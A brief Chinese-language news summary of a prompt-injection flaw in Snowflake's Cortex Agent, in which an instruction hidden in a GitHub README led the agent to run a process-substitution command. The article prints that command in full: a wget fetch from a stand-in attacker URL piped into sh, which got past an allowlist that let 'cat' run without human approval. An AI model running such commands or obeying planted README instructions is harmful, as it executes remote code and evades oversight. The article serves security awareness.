Snowflake Cortex AI 沙箱漏洞：提示注入导致恶意代码执行

近日，Hacker News 报道指出，Snowflake 的 Cortex Agent 存在一个通过提示注入（prompt injection）发起的攻击链漏洞。攻击者在 GitHub 仓库的 README 文件末尾隐藏了恶意代码，成功诱导 Cortex 代理执行了如下命令：cat < (sh < (wget -q0 https://ATTACKER_URL.com/bugbot))。该命令利用了命令行中的过程替换（process substitution）技术，绕过了 Cortex 对 cat 命令的安全限制。Cortex 将 cat 标记为安全命令，允许其在无需人工批准的情况下运行，但未能有效防范此类攻击。该漏洞已被修复，但引发了对 AI 代理安全策略可靠性的广泛讨论。作者指出，许多代理工具采用类似的策略，但其本质存在安全隐患，因此更倾向于研究确定性沙箱技术，以提升 AI 代理的安全边界。